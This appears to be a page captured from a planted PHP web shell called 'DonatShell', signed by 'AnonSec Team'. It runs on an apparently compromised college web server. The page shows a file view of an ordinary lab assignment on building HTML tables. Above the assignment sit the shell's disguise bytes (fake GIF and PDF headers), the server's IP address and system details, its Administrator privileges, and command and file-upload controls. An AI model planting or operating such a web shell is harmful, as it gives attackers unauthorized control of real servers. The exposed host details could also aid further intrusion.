GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /nginx/html/JimMartinson/CST1021/Labs/Lab11/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /nginx/html/JimMartinson/CST1021/Labs/Lab11//Lab11.phpinc
<?
// JimMartinson/CST1021/Labs/Lab10/Lab10.phpinc

$css .= ',colorCode.css';
require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // Replaced.
require('common/Browser/Browser.phpinc');

$disabled = '';
$disabled = ' disabled';

?>

<fieldset><legend>Description</legend>
The purpose of this lab is to demonstrate your ability to use tables on a web page.
<?=$gradeNote?>
<? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?>
</fieldset>

<fieldset><legend><?=$evaluationType?> Instruction</legend>
<ol id="main" class="count">
	<!-- 1 -->
	<li>Create a folder for this <?=strtolower($evaluationType)?> named <b><?=$evaluationName?></b> and keep all documents used for <?=$evaluationType?> <?=$evaluationNumber?> in that folder.
	<!-- 2 -->
	<li class="css">Create an external style sheet named <b><?=$evaluationName?>.css</b>.
		<ol>
			<li>At the top of the style sheet, set the character set with: <tag>@charset <val>"utf-8"</val>;</tag></li>
			<li>Add this comment: <span class="highCOM">/* <?=$evaluationType?> <?=$evaluationNumber?> External Style Sheet - <?=$userFullName?> */</span></li>
			<li>This file will contain all CSS code needed to complete this assignment.</li>
		</ol>
	</li>
	<!-- 3 -->
	<li class="page">Create a web page named <b><?=$evaluationName?>.html</b>.
		<br><span class="note normal">All css declarations must be in the external style sheet. No internal or inline styles may be used in the html.</span>
		<ol type="a">
			<!-- 3.1 -->
			<li>Title the page <span-content class="copyText"><?=$pageTitle?></span-content>.</li>
			<!-- 3.2 -->
			<li>Add a <span class="highELE">link</span> to the <?=$evaluationName?>.css external style sheet</li>
			<!-- 3.3 -->
			<li>Place the following data in a table with 3 rows and 6 columns with a styled border:
				<br><img src="images/table1.png" alt="alt" border="0" width="266" height="79">
				<br><span class="note"><ins title="Added 12/3/2022">Both the table and the cells have a border.</ins></span>
			</li>
			<!-- 3.4 -->
			<li>Copy that table and make the copy display the data in equal width cells:
				<br><img src="images/table2.png" alt="alt" border="0" width="400" height="79">
				<br><span class="note"><ins title="Added 12/3/2022">You may not use a table layout of fixed to do this.</ins></span>
			</li>
			<!-- 3.5 -->
			<li>Copy the second table and add the top and side headings to the copied table. Also align, color, and format the text as below:
				<br><img src="images/table3.png" alt="alt" border="0" width="557" height="104">
				<br><span class="note">The degree symbol (<b>&deg;</b>) in the above table. I want you to have this in your assignment.</span>
			</li>
			<!-- 3.6 -->
			<li>Create a fourth table that looks like the following:
			<style>
				table.asmt { border:1px solid red; border-collapse:separate; }
				table.asmt td { border:1px solid blue; }
			</style>
				<br><img src="images/table4.png" alt="alt" width="210" height="120" border="0">
				<br>
				<span class="note">When the assignment is complete, there should now be four tables like to the ones shown above.</span>
			</li>
		</ol>
	</li>
	<!-- 4 -->
	<li>Demonstrate the web page.
		<ol>
			<!-- 4.1 -->
			<li>Open a browser and load the <b><?=$evaluationName?>.html</b> page.</li>
			<!-- 4. -->
			<li><b class="info">Take a screenshot</b> and save it in the <b><?=$evaluationName?></b> directory as <b style="white-space:nowrap;"><?=$courseNumber?>-<?=$evaluationName?>a-<?=$userFileName?>.png</b>.
				<br><div id="show_page_a" class="inline"><a href="#" onClick="divHide('show_page_a'); divShow('hide_page_a'); return false;">See an example:</a></div>
				<div id="hide_page_a" class="hidden"><a href="#" onClick="divHide('hide_page_a'); divShowInline('show_page_a'); return false;">Hide the example.</a>
				<? BrowserBegin($evaluationType.' '.$evaluationNumber.' - Jim Martinson - Tables','file:///'.$courseNumber.'/'.$evaluationName.'/'.$evaluationName.'.html',763); ?>
				<h1><?=$evaluationType?> <?=$evaluationNumber?> - <?=$userFullName?></h1>
				<br><img src="images/table1.png" alt="alt" border="0" width="266" height="79">
				<br><br><img src="images/table2.png" alt="alt" border="0" width="400" height="79">
				<br><br><img src="images/table3.png" alt="alt" border="0" width="557" height="104">
				<br><br><img src="images/table4.png" alt="alt" width="210" height="120" border="0">
				<? BrowserEnd(); ?>
				</div>
			</li>
		</ol>
		<span class="note">There needs to be at least 1em (one line) of space between the tables. They should NOT be packed tight against each other.</span>
	</li>
	<!-- 5 -->
	<li>Turn in your assignment:
			<li>Zip up your <b><?=$evaluationName?></b> folder into a file named <b><?=$uploadFilename?></b>.</li>
			<li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload" id="inpFileUpload"<?=$disabled?>><div id="divFileploadError"></div></li>
			<li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"<?=$disabled?>> for grading.</li>
		</ol>
	</li>
</ol><? if ( $disabled ) { ?><span class="error bold">Notice: Do not perform this assignment unless this notice has been removed.</span><? } ?>
</fieldset>
<script src="/js/colorCode.js"></script>
<?
$PartialGradingCriteria = '
Deductions for any elements required by the lab that are not present or incorrect:
<br>
-assignmentPoints if the <a href="https://jigsaw.w3.org/css-validator/validator.html.en#validate_by_input">CSS Validation Service</a> or <a href="https://validator.w3.org/#validate_by_input">Markup Validation Service</a> report errors.
No further grading will be done.
<br>
-1 for each missing element or like group.
<br>
-1 for each incorrect element or like group.
<br>
-1 for any additional html elements that have errors. 
<br>
<span class="note">Do not add any additional code or styling other than what is required by the lab.
<br>I will deduct points for additional code or styling that are incorrect or cause problems.</span>
';
require('../LabNotes.phpinc');
require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced.
#require('../../ReferencesResources.phpinc');
#require($Instructor['Path'].'/ContactInformation.phpinc');
if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n";
?>

Anon7 - 2022
AnonSec Team